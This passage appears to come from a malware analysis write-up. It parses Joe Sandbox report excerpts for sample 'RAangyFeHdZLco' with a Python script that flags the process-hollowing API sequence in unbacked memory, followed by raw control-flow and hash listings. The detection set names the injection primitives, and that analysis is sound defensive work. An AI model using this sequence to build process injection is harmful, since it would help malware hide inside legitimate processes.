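• Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
• API ID: ContextThreadWow64
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B6D427
• Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
• API ID: DuplicateHandle
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C1CD2E
• Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
• API ID: AllocVirtual
• Source File: 00000014.00000002.1416081126.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
• API ID: ResumeThread
• GetModuleHandleW.KERNELBASE(00000000), ref: 00B6B126
• Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
• API ID: HandleModule
• Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
• API ID:
"""

# Assumed line shapes (derived from the report text, not from a published schema).
API_CALL = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")
SOURCE = re.compile(r"^•\s*Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)", re.I)
API_ID = re.compile(r"^•\s*API ID:\s*(\S*)\s*$")

# Hollowing primitives in the report's normalized API ID form
# (VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread).
HOLLOWING_CHAIN = frozenset({"AllocVirtual", "MemoryProcessWrite", "ContextThreadWow64", "ResumeThread"})


@dataclass
class FunctionEntry:
    region: str        # Offset of the dump the function was lifted from
    pe_backed: bool    # False ("based on PE: false") = memory not backed by an image on disk
    api_id: str        # Joe Sandbox normalized API name, e.g. MemoryProcessWrite
    calls: list = field(default_factory=list)  # (Win32 name, module, call-site address)


def parse_entries(text):
    """One FunctionEntry per "API ID" line; call lines seen before it belong to it."""
    entries, pending_calls, pending_src = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_CALL.match(line):
            pending_calls.append((m[1], m[2], m[4]))
        elif m := SOURCE.match(line):
            pending_src = (m[2].upper(), m[3].lower() == "true")
        elif m := API_ID.match(line):
            if pending_src is None:
                raise ValueError(f"API ID without Memory Dump Source: {line}")
            entries.append(FunctionEntry(pending_src[0], pending_src[1], m[1], pending_calls))
            pending_calls, pending_src = [], None
    return entries


def api_ids_by_region(entries):
    """Set of non-empty API IDs per dump region."""
    grouped = defaultdict(set)
    for e in entries:
        if e.api_id:
            grouped[e.region].add(e.api_id)
    return dict(grouped)


def hollowing_coverage(entries):
    """Per region: which chain primitives its functions call, whether the set is
    complete, and whether the region is unbacked executable memory."""
    unbacked = {e.region for e in entries if not e.pe_backed}
    return {
        region: {
            "chain_hits": sorted(HOLLOWING_CHAIN & ids),
            "complete": HOLLOWING_CHAIN <= ids,
            "unbacked": region in unbacked,
        }
        for region, ids in api_ids_by_region(entries).items()
    }


def call_sites(entries, region):
    """Win32 call sites lifted from one region, sorted by call-site address.
    Address order is layout, not execution order."""
    return sorted((c for e in entries if e.region == region for c in e.calls),
                  key=lambda c: int(c[2], 16))


if __name__ == "__main__":
    ents = parse_entries(REPORT_EXCERPT)
    for region, info in hollowing_coverage(ents).items():
        print(region, info)
    for name, module, ref in call_sites(ents, "06C10000"):
        print(f"  {ref} {module}!{name}")
```

In this sample every member of the injection set comes from the dump at 06C10000 with "based on PE: false", i.e. executable memory not backed by an image on disk, while 00B60000 contributes only DuplicateHandle and GetModuleHandleW. The ref address is the call site within that region, not the order in which the calls run, so the listing sorts by address only for orientation.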

                                                                                    Control-flow Graph
                                                                                    • Blocks: 306 b6b0c0-b6b100; 307 b6b102-b6b105; 308 b6b108-b6b133 [GetModuleHandleW]; 309 b6b135-b6b13b; 310 b6b13c-b6b150
                                                                                    • Edges: 306->307, 306->308, 307->308, 308->309, 308->310, 309->310
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00B6B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: a1dc329b06e343b49cf9da2d0c5d9f38b7484df45e8d1a9149f92a9bebf77b3e
                                                                                    • Instruction ID: 1c2028920ce9d5ac9186eed6909c2b5c7c5eb1df5562bb6fd5f10f13305f1c81
                                                                                    • Opcode Fuzzy Hash: a1dc329b06e343b49cf9da2d0c5d9f38b7484df45e8d1a9149f92a9bebf77b3e
                                                                                    • Instruction Fuzzy Hash: 43110FB6C002499FDB20CF9AC844BDEFBF4EB89314F10845AD428B7200D379A585CFA5
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00B6B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1406542811.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b60000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: b5528329f61244ec2720d10dce5cdbd6c747f4c5ce9fce8f7a4956b089229798
                                                                                    • Instruction ID: 40468cce665631276e0aedf3c5a43e3c48883388f646a92a6dd2e8e60702d04b
                                                                                    • Opcode Fuzzy Hash: b5528329f61244ec2720d10dce5cdbd6c747f4c5ce9fce8f7a4956b089229798
                                                                                    • Instruction Fuzzy Hash: E1F037B68043548FEB11DF99E404BDEBBF0AF4A314F14848AD458AB262C379A589CF65
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4
                                                                                    • API String ID: 0-4088798008
                                                                                    • Opcode ID: f174de91bd6f28bc212eae07041bb8adffbf4b60033392ea4b1ebcb856470eaa
                                                                                    • Instruction ID: 5ead4d709b21cd43d47cff2b84eed3ceb26b095ae4cb6d5c84003187d99c1d5b
                                                                                    • Opcode Fuzzy Hash: f174de91bd6f28bc212eae07041bb8adffbf4b60033392ea4b1ebcb856470eaa
                                                                                    • Instruction Fuzzy Hash: B0C0803091B10CE7C600DB91DE0156D775C9B00940F4041C7550913200E9351F115592
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4
                                                                                    • API String ID: 0-4088798008
                                                                                    • Opcode ID: 4d3a561061bc4802fa560a106307615eee1c035fc2bc4785823aaf9bc7012ddb
                                                                                    • Instruction ID: b1ec21f01ba6608bece7863be5b4dd5c41edb9c3235151d283887fe7d3db5a2e
                                                                                    • Opcode Fuzzy Hash: 4d3a561061bc4802fa560a106307615eee1c035fc2bc4785823aaf9bc7012ddb
                                                                                    • Instruction Fuzzy Hash: 7CC08C30A1A10CE7C600EB81DA0152CB3AC9B00A80F4082C78A0A23200EA3A2F229682
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1389623076.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9ad000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2a436710c4f8abc11081f2857e09b5762b868023540938ca5e5940ef035d2b97
                                                                                    • Instruction ID: df68fe9ef1bee0ce0018069bb06090586741a035aa8cfdb61d9a9eb242c17cf5
                                                                                    • Opcode Fuzzy Hash: 2a436710c4f8abc11081f2857e09b5762b868023540938ca5e5940ef035d2b97
                                                                                    • Instruction Fuzzy Hash: CD212871505304DFDF14DF10D9C4B16BBA5FB99314F20C569E90A0F6A6C33AE856CAE2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1389623076.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9ad000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0bdcc4c45e837a8c8cf68f8176766d64804b108f15b4296aec9d5009a0a7f0da
                                                                                    • Instruction ID: d688c68bfde31a8c689ee35aab402677f83abfce023ccac0cc0e7958ae89e2d3
                                                                                    • Opcode Fuzzy Hash: 0bdcc4c45e837a8c8cf68f8176766d64804b108f15b4296aec9d5009a0a7f0da
                                                                                    • Instruction Fuzzy Hash: F6212871905240DFDB15DF10D9C0B26BFA5FB89318F24C569F8060B65AC336D856DBE2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1395065779.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9cd000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d5a7dc55f40e7688f567e46dc048740e171fafd53bce8559a8aeb52142bf391
                                                                                    • Instruction ID: a6064d35cd34722a79b8bc012ea5a82d90140d09bf0f539a656a21799f150f36
                                                                                    • Opcode Fuzzy Hash: 0d5a7dc55f40e7688f567e46dc048740e171fafd53bce8559a8aeb52142bf391
                                                                                    • Instruction Fuzzy Hash: B321D371905200EFDB14DF28D5C4F16BBA5FB84314F20C97DE84A4B296C33AD847CA62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1395065779.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9cd000_RAangyFeHdZLco.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1395065779.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9cd000_RAangyFeHdZLco.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1389623076.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9ad000_RAangyFeHdZLco.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1389623076.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9ad000_RAangyFeHdZLco.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1395065779.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_9cd000_RAangyFeHdZLco.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.1417791958.000000000B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B410000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_b410000_RAangyFeHdZLco.jbxd

                                                                                    Execution Graph

                                                                                    Execution Coverage:0.1%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:5
                                                                                    Total number of Limit Nodes:1
                                                                                    execution_graph 62747 1072b60 LdrInitializeThunk 62750 1072c00 62752 1072c0a 62750->62752 62753 1072c11 62752->62753 62754 1072c1f LdrInitializeThunk 62752->62754

Control-flow Graph (rendered graph not recoverable; node and edge list follows)

control_flow_graph 0 1072c0a-1072c0f 1 1072c11-1072c18 0->1 2 1072c1f-1072c26 LdrInitializeThunk 0->2
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(0108FD4F,000000FF,00000024,01126634,00000004,00000000,?,-00000018,7D810F61,?,?,01048B12,?,?,?,?), ref: 01072C24
Memory Dump Source
• Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

Control-flow Graph (rendered graph not recoverable; node and edge list follows)

control_flow_graph 4 1072b60-1072b6c LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(010A0DBD,?,?,?,?,01094302), ref: 01072B6A
Memory Dump Source
• Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

Control-flow Graph (rendered graph not recoverable; node and edge list follows)

control_flow_graph 5 1072df0-1072dfc LdrInitializeThunk
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(010AE73E,0000005A,0110D040,00000020,00000000,0110D040,00000080,01094A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0107AE00), ref: 01072DFA
Memory Dump Source
• Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

Control-flow Graph (rendered graph not recoverable; node and edge list follows)

control_flow_graph 6 10735c0-10735cc LdrInitializeThunk
                                                                                    APIs
Memory Dump Source
• Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0

Control-flow Graph (rendered graph not recoverable; node and edge list follows)

control_flow_graph 7 42e66e-42e6b7 call 42eba3 9 42e6bc-42e6c3 7->9 10 42e6d2-42e6d7 9->10 11 42e731-42e736 10->11 12 42e6d9-42e6e2 10->12 13 42e6f1-42e6f6 12->13 14 42e6f8-42e700 13->14 15 42e709-42e72e 13->15 16 42e706 14->16 15->11 16->15
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 7
                                                                                    • API String ID: 0-1790921346

Control-flow Graph (rendered graph not recoverable; node and edge list follows)

control_flow_graph 19 42e673-42e6b0 20 42e6bc-42e6d7 19->20 21 42e6b7 call 42eba3 19->21 23 42e731-42e736 20->23 24 42e6d9-42e6f6 20->24 21->20 26 42e6f8-42e700 24->26 27 42e709-42e72e 24->27 28 42e706 26->28 27->23 28->27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 7
                                                                                    • API String ID: 0-1790921346
                                                                                    • Opcode ID: e55fad14fc7f3018d0ccdd0179df70b6800531c4d1e73adc82dcbd939ccc2e56
                                                                                    • Instruction ID: aeb7108a66a03e4f16c0801649bb66297010c4efd1575f8cefc26ce58c751e98
                                                                                    • Opcode Fuzzy Hash: e55fad14fc7f3018d0ccdd0179df70b6800531c4d1e73adc82dcbd939ccc2e56
                                                                                    • Instruction Fuzzy Hash: F71112B1D1022C9AEB60EBA59C81FDDB7B89B08304F4486EA950CF2241FB745B54CF69

                                                                                    Control-flow Graph (basic blocks 42ea74-42eac2; no calls)
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6cb78329dcf4b9b39d95253f4088f01b96c5dbe9ccf2f46c81b946819ba498ad
                                                                                    • Instruction ID: 2c22d35e3ec6202f00ec1e7601048481733a4c0cef13d9316e1113bdb273f745
                                                                                    • Opcode Fuzzy Hash: 6cb78329dcf4b9b39d95253f4088f01b96c5dbe9ccf2f46c81b946819ba498ad
                                                                                    • Instruction Fuzzy Hash: DFF01D71610249AFCB04CF65D881EDAB7A9FF48750F44C219FD188B641D774F510CBA0

                                                                                    Control-flow Graph (basic blocks 42ebd9-42ec1c; calls 42eba3)
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b789c4b77e8d625e455ec7da4014869dac3e6f28b0031a3c5e98841541b7d097
                                                                                    • Instruction ID: 4e477b9291399ee4fa54d52cc7128c14bd1051cbe746cfb2af746729ae629333
                                                                                    • Opcode Fuzzy Hash: b789c4b77e8d625e455ec7da4014869dac3e6f28b0031a3c5e98841541b7d097
                                                                                    • Instruction Fuzzy Hash: F5E0923674013067D224969BBD06F9BB769CFC5B64F45012AFA0CAF300D679A94182E8

                                                                                    Control-flow Graph (basic blocks 42ebe3-42ec1c; calls 42eba3)
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e60cb7d3f0c613258d98b06d04eb9e234b025b9bfc7fd101d605e74c62703551
                                                                                    • Instruction ID: ab09885700ff2295b831fa202e34530ee4bc5756ccb4f6bce278b389399df640
                                                                                    • Opcode Fuzzy Hash: e60cb7d3f0c613258d98b06d04eb9e234b025b9bfc7fd101d605e74c62703551
                                                                                    • Instruction Fuzzy Hash: ADE04F36B0022427D624568BAC06FAB775C8BC1F64F45007AFF089B341E5AAB94042E8

                                                                                    Control-flow Graph (basic blocks 42ea83-42eac2; no calls)
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 76f9412881cc483d7444044b4663303154a551c15abac0575d8caa21bae148dc
                                                                                    • Instruction ID: b3225e471a334d12d6b4e2e0b2e988b0112f5ce8ff5ea0de0dc774f1f96fa678
                                                                                    • Opcode Fuzzy Hash: 76f9412881cc483d7444044b4663303154a551c15abac0575d8caa21bae148dc
                                                                                    • Instruction Fuzzy Hash: 94F0ACB6610209AFDB04CF59D881EDB77A9EB88760F04C619FD198B241D774FA10CBA0

                                                                                    Control-flow Graph (basic blocks 42eb01-42eb20; no calls)
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 27fe8dd7ff64c6864b55a675b012a2f9a159db4f608b718855abb04f4579ed9b
                                                                                    • Instruction ID: 43b74294e33dc70a61e556a37c7a73b8cd96ed5e74a6e6ca916f427e9e95b809
                                                                                    • Opcode Fuzzy Hash: 27fe8dd7ff64c6864b55a675b012a2f9a159db4f608b718855abb04f4579ed9b
                                                                                    • Instruction Fuzzy Hash: C5D01275600204BFDB50DBA8D886FE93B6CDB18350F004065B90CDB281E571B550CB14

                                                                                    Control-flow Graph (basic blocks 42eb03-42eb20; no calls)
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1501924365.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_42e000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: be1a69f92bacebee83dc76a8e5915979dfc30708ddf466f9b31faffeeecea4b3
                                                                                    • Instruction ID: 6007c0202d4c02c32fd29c269217da7855efd4c830add205a4cceb19adf9aa07
                                                                                    • Opcode Fuzzy Hash: be1a69f92bacebee83dc76a8e5915979dfc30708ddf466f9b31faffeeecea4b3
                                                                                    • Instruction Fuzzy Hash: 20C080756103087FD740DB8CDC46F6533DC9708710F404065B90C8F341E570F9504758

                                                                                    Control-flow Graph (basic blocks 1074a80-1074b26; calls RtlDebugPrintTimes, 105f5a0, 1061e46)
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: 0Ivw$0Ivw$0Ivw$0Ivw$0Ivw$0Ivw
                                                                                    • API String ID: 3446177414-4119021165
                                                                                    • Opcode ID: a09c6f9c536a2ed86b4351042bb652fb47b1e5219c6e7c7188bd5208e3b74bb7
                                                                                    • Instruction ID: 976541080c61cab5b535f03f7cbac9f3e289d512b506b7852afa4c5c51d76846
                                                                                    • Opcode Fuzzy Hash: a09c6f9c536a2ed86b4351042bb652fb47b1e5219c6e7c7188bd5208e3b74bb7
                                                                                    • Instruction Fuzzy Hash: B701D232E0027C7AE77C9E2D79047862AD5B384738F15406AE958DF284D7644CE1C398

                                                                                    Control-flow Graph (basic blocks 1072890-10729b1 and 10aa4bc-10aa5c9; calls 1080050)
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmp
